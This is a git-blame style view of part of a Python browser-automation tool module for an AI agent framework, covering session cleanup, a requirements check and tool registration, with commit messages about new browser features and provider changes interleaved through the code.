2026-03-28 17:25:04 -07:00
" analysis " : analysis or " Vision analysis returned no content. " ,
2026-03-07 22:57:05 -08:00
" screenshot_path " : str ( screenshot_path ) ,
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
}
# Include annotation data if annotated screenshot was taken
if annotate and result . get ( " data " , { } ) . get ( " annotations " ) :
response_data [ " annotations " ] = result [ " data " ] [ " annotations " ]
return json . dumps ( response_data , ensure_ascii = False )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
except Exception as e :
2026-03-08 19:31:23 -07:00
# Keep the screenshot if it was captured successfully — the failure is
# in the LLM vision analysis, not the capture. Deleting a valid
# screenshot loses evidence the user might need. The 24-hour cleanup
# in _cleanup_old_screenshots prevents unbounded disk growth.
2026-03-08 19:54:32 -07:00
logger . warning ( " browser_vision failed: %s " , e , exc_info = True )
2026-03-14 11:34:31 -07:00
error_info = { " success " : False , " error " : f " Error during vision analysis: { str ( e ) } " }
2026-03-07 22:57:05 -08:00
if screenshot_path . exists ( ) :
2026-03-08 19:31:23 -07:00
error_info [ " screenshot_path " ] = str ( screenshot_path )
error_info [ " note " ] = " Screenshot was captured but vision analysis failed. You can still share it via MEDIA:<path>. "
return json . dumps ( error_info , ensure_ascii = False )
2026-03-07 22:57:05 -08:00
def _cleanup_old_screenshots ( screenshots_dir , max_age_hours = 24 ) :
2026-03-14 02:56:06 -07:00
""" Remove browser screenshots older than max_age_hours to prevent disk bloat.
Throttled to run at most once per hour per directory to avoid repeated
scans on screenshot - heavy workflows .
"""
key = str ( screenshots_dir )
now = time . time ( )
if now - _last_screenshot_cleanup_by_dir . get ( key , 0.0 ) < 3600 :
return
_last_screenshot_cleanup_by_dir [ key ] = now
2026-03-07 22:57:05 -08:00
try :
cutoff = time . time ( ) - ( max_age_hours * 3600 )
for f in screenshots_dir . glob ( " browser_screenshot_*.png " ) :
2026-01-29 06:10:24 +00:00
try :
2026-03-07 22:57:05 -08:00
if f . stat ( ) . st_mtime < cutoff :
f . unlink ( )
2026-03-10 06:59:20 -07:00
except Exception as e :
logger . debug ( " Failed to clean old screenshot %s : %s " , f , e )
except Exception as e :
logger . debug ( " Screenshot cleanup error (non-critical): %s " , e )
2026-01-29 06:10:24 +00:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
def _cleanup_old_recordings ( max_age_hours = 72 ) :
""" Remove browser recordings older than max_age_hours to prevent disk bloat. """
import time
try :
2026-04-03 12:32:10 -07:00
hermes_home = get_hermes_home ( )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
recordings_dir = hermes_home / " browser_recordings "
if not recordings_dir . exists ( ) :
return
cutoff = time . time ( ) - ( max_age_hours * 3600 )
for f in recordings_dir . glob ( " session_*.webm " ) :
try :
if f . stat ( ) . st_mtime < cutoff :
f . unlink ( )
2026-03-10 06:59:20 -07:00
except Exception as e :
logger . debug ( " Failed to clean old recording %s : %s " , f , e )
except Exception as e :
logger . debug ( " Recording cleanup error (non-critical): %s " , e )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
2026-01-29 06:10:24 +00:00
# ============================================================================
# Cleanup and Management Functions
# ============================================================================
def cleanup_browser ( task_id : Optional [ str ] = None ) - > None :
"""
Clean up browser session for a task .
2026-03-14 11:34:31 -07:00
2026-01-31 21:42:15 -08:00
Called automatically when a task completes or when inactivity timeout is reached .
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
Closes both the agent - browser / Browserbase session and Camofox sessions .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
task_id : Task identifier to clean up
"""
if task_id is None :
task_id = " default "
2026-03-14 11:34:31 -07:00
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
# Also clean up Camofox session if running in Camofox mode
if _is_camofox_mode ( ) :
try :
from tools . browser_camofox import camofox_close
camofox_close ( task_id )
except Exception as e :
logger . debug ( " Camofox cleanup for task %s : %s " , task_id , e )
feat: switch managed browser provider from Browserbase to Browser Use (#5750)
* feat: switch managed browser provider from Browserbase to Browser Use
The Nous subscription tool gateway now routes browser automation through
Browser Use instead of Browserbase. This commit:
- Adds managed Nous gateway support to BrowserUseProvider (idempotency
keys, X-BB-API-Key auth header, external_call_id persistence)
- Removes managed gateway support from BrowserbaseProvider (now
direct-only via BROWSERBASE_API_KEY/BROWSERBASE_PROJECT_ID)
- Updates browser_tool.py fallback: prefers Browser Use over Browserbase
- Updates nous_subscription.py: gateway vendor 'browser-use', auto-config
sets cloud_provider='browser-use' for new subscribers
- Updates tools_config.py: Nous Subscription entry now uses Browser Use
- Updates setup.py, cli.py, status.py, prompt_builder.py display strings
- Updates all affected tests to match new behavior
Browserbase remains fully functional for users with direct API credentials.
The change only affects the managed/subscription path.
* chore: remove redundant Browser Use hint from system prompt
* fix: upgrade Browser Use provider to v3 API
- Base URL: api/v2 -> api/v3 (v2 is legacy)
- Unified all endpoints to use native Browser Use paths:
- POST /browsers (create session, returns cdpUrl)
- PATCH /browsers/{id} with {action: stop} (close session)
- Removed managed-mode branching that used Browserbase-style
/v1/sessions paths — v3 gateway now supports /browsers directly
- Removed unused managed_mode variable in close_session
* fix(browser-use): use X-Browser-Use-API-Key header for managed mode
The managed gateway expects X-Browser-Use-API-Key, not X-BB-API-Key
(which is a Browserbase-specific header). Using the wrong header caused
a 401 AUTH_ERROR on every managed-mode browser session create.
Simplified _headers() to always use X-Browser-Use-API-Key regardless
of direct vs managed mode.
* fix(nous_subscription): browserbase explicit provider is direct-only
Since managed Nous gateway now routes through Browser Use, the
browserbase explicit provider path should not check managed_browser_available
(which resolves against the browser-use gateway). Simplified to direct-only
with managed=False.
* fix(browser-use): port missing improvements from PR #5605
- CDP URL normalization: resolve HTTP discovery URLs to websocket after
cloud provider create_session() (prevents agent-browser failures)
- Managed session payload: send timeout=5 and proxyCountryCode=us for
gateway-backed sessions (prevents billing overruns)
- Update prompt builder, browser_close schema, and module docstring to
replace remaining Browserbase references with Browser Use
- Dynamic /browser status detection via _get_cloud_provider() instead
of hardcoded env var checks (future-proof for new providers)
- Rename post_setup key from 'browserbase' to 'agent_browser'
- Update setup hint to mention Browser Use alongside Browserbase
- Add tests: CDP normalization, browserbase direct-only guard,
managed browser-use gateway, direct browserbase fallback
---------
Co-authored-by: rob-maron <132852777+rob-maron@users.noreply.github.com>
2026-04-07 22:40:22 +10:00
2026-02-21 03:11:11 -08:00
logger . debug ( " cleanup_browser called for task_id: %s " , task_id )
logger . debug ( " Active sessions: %s " , list ( _active_sessions . keys ( ) ) )
2026-03-14 11:34:31 -07:00
2026-02-21 00:44:25 -08:00
# Check if session exists (under lock), but don't remove yet -
# _run_browser_command needs it to build the close command.
with _cleanup_lock :
session_info = _active_sessions . get ( task_id )
2026-03-14 11:34:31 -07:00
2026-02-21 00:44:25 -08:00
if session_info :
2026-01-29 06:10:24 +00:00
bb_session_id = session_info . get ( " bb_session_id " , " unknown " )
2026-03-14 11:34:31 -07:00
logger . debug ( " Found session for task %s : bb_session_id= %s " , task_id , bb_session_id )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
# Stop auto-recording before closing (saves the file)
_maybe_stop_recording ( task_id )
2026-03-14 11:34:31 -07:00
2026-02-21 00:44:25 -08:00
# Try to close via agent-browser first (needs session in _active_sessions)
2026-01-29 06:10:24 +00:00
try :
_run_browser_command ( task_id , " close " , [ ] , timeout = 10 )
2026-03-14 11:34:31 -07:00
logger . debug ( " agent-browser close command completed for task %s " , task_id )
2026-01-29 06:10:24 +00:00
except Exception as e :
2026-03-14 11:34:31 -07:00
logger . warning ( " agent-browser close failed for task %s : %s " , task_id , e )
2026-02-21 00:44:25 -08:00
# Now remove from tracking under lock
with _cleanup_lock :
_active_sessions . pop ( task_id , None )
_session_last_activity . pop ( task_id , None )
2026-03-14 11:34:31 -07:00
2026-03-17 00:16:34 -07:00
# Cloud mode: close the cloud browser session via provider API
if bb_session_id :
provider = _get_cloud_provider ( )
if provider is not None :
try :
provider . close_session ( bb_session_id )
except Exception as e :
logger . warning ( " Could not close cloud browser session: %s " , e )
2026-03-14 11:34:31 -07:00
2026-02-21 00:44:25 -08:00
# Kill the daemon process and clean up socket directory
2026-02-09 04:35:25 +00:00
session_name = session_info . get ( " session_name " , " " )
if session_name :
2026-03-14 11:34:31 -07:00
socket_dir = os . path . join ( _socket_safe_tmpdir ( ) , f " agent-browser- { session_name } " )
2026-02-09 04:35:25 +00:00
if os . path . exists ( socket_dir ) :
2026-02-21 00:44:25 -08:00
# agent-browser writes {session}.pid in the socket dir
pid_file = os . path . join ( socket_dir , f " { session_name } .pid " )
if os . path . isfile ( pid_file ) :
try :
2026-03-08 22:39:17 +03:00
daemon_pid = int ( Path ( pid_file ) . read_text ( ) . strip ( ) )
2026-02-21 00:44:25 -08:00
os . kill ( daemon_pid , signal . SIGTERM )
2026-03-14 11:34:31 -07:00
logger . debug ( " Killed daemon pid %s for %s " , daemon_pid , session_name )
2026-02-21 00:44:25 -08:00
except ( ProcessLookupError , ValueError , PermissionError , OSError ) :
2026-03-14 11:34:31 -07:00
logger . debug ( " Could not kill daemon pid for %s (already dead or inaccessible) " , session_name )
2026-02-09 04:35:25 +00:00
shutil . rmtree ( socket_dir , ignore_errors = True )
2026-03-14 11:34:31 -07:00
2026-02-21 03:11:11 -08:00
logger . debug ( " Removed task %s from active sessions " , task_id )
else :
logger . debug ( " No active session found for task_id: %s " , task_id )
2026-01-29 06:10:24 +00:00
def cleanup_all_browsers ( ) - > None :
"""
Clean up all active browser sessions .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Useful for cleanup on shutdown .
"""
2026-01-31 21:42:15 -08:00
with _cleanup_lock :
2026-02-21 00:44:25 -08:00
task_ids = list ( _active_sessions . keys ( ) )
for task_id in task_ids :
cleanup_browser ( task_id )
2026-01-29 06:10:24 +00:00
# ============================================================================
# Requirements Check
# ============================================================================
def check_browser_requirements ( ) - > bool :
"""
Check if browser tool requirements are met .
2026-03-07 01:14:57 -08:00
2026-04-06 14:05:26 -07:00
In * * local mode * * ( no cloud provider configured ) : only the
` ` agent - browser ` ` CLI must be findable .
In * * cloud mode * * ( Browserbase , Browser Use , or Firecrawl ) : the CLI
* and * the provider ' s required credentials must be present.
2026-03-07 01:14:57 -08:00
2026-01-29 06:10:24 +00:00
Returns :
True if all requirements are met , False otherwise
"""
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
# Camofox backend — only needs the server URL, no agent-browser CLI
if _is_camofox_mode ( ) :
return True
2026-03-07 01:14:57 -08:00
# The agent-browser CLI is always required
2026-01-29 06:10:24 +00:00
try :
_find_agent_browser ( )
except FileNotFoundError :
return False
2026-03-17 00:16:34 -07:00
# In cloud mode, also require provider credentials
provider = _get_cloud_provider ( )
if provider is not None and not provider . is_configured ( ) :
return False
2026-03-07 01:14:57 -08:00
return True
2026-01-29 06:10:24 +00:00
# ============================================================================
# Module Test
# ============================================================================
if __name__ == " __main__ " :
"""
Simple test / demo when run directly
"""
print ( " 🌐 Browser Tool Module " )
print ( " = " * 40 )
2026-03-07 01:14:57 -08:00
2026-03-17 00:16:34 -07:00
_cp = _get_cloud_provider ( )
mode = " local " if _cp is None else f " cloud ( { _cp . provider_name ( ) } ) "
2026-03-07 01:14:57 -08:00
print ( f " Mode: { mode } " )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Check requirements
if check_browser_requirements ( ) :
print ( " ✅ All requirements met " )
else :
print ( " ❌ Missing requirements: " )
try :
_find_agent_browser ( )
except FileNotFoundError :
print ( " - agent-browser CLI not found " )
2026-03-14 11:34:31 -07:00
print ( " Install: npm install -g agent-browser && agent-browser install --with-deps " )
2026-03-17 00:16:34 -07:00
if _cp is not None and not _cp . is_configured ( ) :
print ( f " - { _cp . provider_name ( ) } credentials not configured " )
2026-03-26 15:27:27 -07:00
print ( " Tip: set browser.cloud_provider to ' local ' to use free local mode instead " )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
print ( " \n 📋 Available Browser Tools: " )
for schema in BROWSER_TOOL_SCHEMAS :
print ( f " 🔹 { schema [ ' name ' ] } : { schema [ ' description ' ] [ : 60 ] } ... " )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
print ( " \n 💡 Usage: " )
print ( " from tools.browser_tool import browser_navigate, browser_snapshot " )
print ( " result = browser_navigate( ' https://example.com ' , task_id= ' my_task ' ) " )
print ( " snapshot = browser_snapshot(task_id= ' my_task ' ) " )
2026-02-21 20:22:33 -08:00
# ---------------------------------------------------------------------------
# Registry
# ---------------------------------------------------------------------------
refactor: add tool_error/tool_result helpers + read_raw_config, migrate 129 callsites
Add three reusable helpers to eliminate pervasive boilerplate:
tools/registry.py — tool_error() and tool_result():
Every tool handler returns JSON strings. The pattern
json.dumps({"error": msg}, ensure_ascii=False) appeared 106 times,
and json.dumps({"success": False, "error": msg}, ...) another 23.
Now: tool_error(msg) or tool_error(msg, success=False).
tool_result() handles arbitrary result dicts:
tool_result(success=True, data=payload) or tool_result(some_dict).
hermes_cli/config.py — read_raw_config():
Lightweight YAML reader that returns the raw config dict without
load_config()'s deep-merge + migration overhead. Available for
callsites that just need a single config value.
Migration (129 callsites across 32 files):
- tools/: browser_camofox (18), file_tools (10), homeassistant (8),
web_tools (7), skill_manager (7), cronjob (11), code_execution (4),
delegate (5), send_message (4), tts (4), memory (7), session_search (3),
mcp (2), clarify (2), skills_tool (3), todo (1), vision (1),
browser (1), process_registry (2), image_gen (1)
- plugins/memory/: honcho (9), supermemory (9), hindsight (8),
holographic (7), openviking (7), mem0 (7), byterover (6), retaindb (2)
- agent/: memory_manager (2), builtin_memory_provider (1)
2026-04-07 13:36:20 -07:00
from tools . registry import registry , tool_error
2026-02-21 20:22:33 -08:00
_BROWSER_SCHEMA_MAP = { s [ " name " ] : s for s in BROWSER_TOOL_SCHEMAS }
registry . register (
name = " browser_navigate " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_navigate " ] ,
2026-03-14 11:34:31 -07:00
handler = lambda args , * * kw : browser_navigate ( url = args . get ( " url " , " " ) , task_id = kw . get ( " task_id " ) ) ,
2026-02-21 20:22:33 -08:00
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " 🌐 " ,
2026-02-21 20:22:33 -08:00
)
registry . register (
name = " browser_snapshot " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_snapshot " ] ,
handler = lambda args , * * kw : browser_snapshot (
full = args . get ( " full " , False ) , task_id = kw . get ( " task_id " ) , user_task = kw . get ( " user_task " ) ) ,
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " 📸 " ,
2026-02-21 20:22:33 -08:00
)
registry . register (
name = " browser_click " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_click " ] ,
2026-03-17 04:32:39 -07:00
handler = lambda args , * * kw : browser_click ( ref = args . get ( " ref " , " " ) , task_id = kw . get ( " task_id " ) ) ,
2026-02-21 20:22:33 -08:00
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " 👆 " ,
2026-02-21 20:22:33 -08:00
)
registry . register (
name = " browser_type " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_type " ] ,
2026-03-17 04:32:39 -07:00
handler = lambda args , * * kw : browser_type ( ref = args . get ( " ref " , " " ) , text = args . get ( " text " , " " ) , task_id = kw . get ( " task_id " ) ) ,
2026-02-21 20:22:33 -08:00
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " ⌨️ " ,
2026-02-21 20:22:33 -08:00
)
registry . register (
name = " browser_scroll " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_scroll " ] ,
2026-03-17 04:32:39 -07:00
handler = lambda args , * * kw : browser_scroll ( direction = args . get ( " direction " , " down " ) , task_id = kw . get ( " task_id " ) ) ,
